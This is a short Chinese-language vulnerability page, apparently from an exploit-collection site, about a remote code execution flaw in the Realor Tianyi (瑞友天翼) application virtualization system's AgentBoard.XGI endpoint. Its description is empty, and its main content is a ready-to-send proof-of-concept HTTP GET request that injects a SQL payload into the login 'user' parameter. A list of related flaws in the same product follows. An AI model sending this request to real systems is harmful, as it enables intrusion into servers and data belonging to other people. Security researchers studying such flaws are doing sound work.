瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞

漏洞描述

PoC代码

GET /AgentBoard.XGI?cmd=UserLogin&user='||'1 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

相关漏洞推荐

• 瑞友天翼应用虚拟化系统 /RAPAgent.XGI GETApplication SQL 注入漏洞
• 瑞友天翼应用虚拟化系统 index.php /Agent/GetBSAppUrl/AppID SQL 注入漏洞
• 瑞友天翼应用虚拟化系统 /RAPAgent.XGI GetPwdPolicy SQL 注入漏洞
• 瑞友天翼应用虚拟化系统 getUserDetailByAccount SQL注入漏洞
• 瑞友天翼应用虚拟化系统 /index.php SQL 注入漏洞
• 瑞友天翼应用虚拟化系统 appsave SQL注入漏洞
• 瑞友天翼应用虚拟化系统 appdel SQL注入漏洞
• 瑞友天翼应用虚拟化系统 uploadAuthorizeKeyFile 反序列化注入漏洞
• 瑞友天翼应用虚拟化系统 /hmrao.php SQL注入漏洞
• 瑞友天翼应用虚拟化系统 管理控制台 弱口令漏洞
• 瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞
• 瑞友天翼应用虚拟化系统存在远程命令执行漏洞
• 瑞友天翼应用虚拟化系统存在远程命令执行漏洞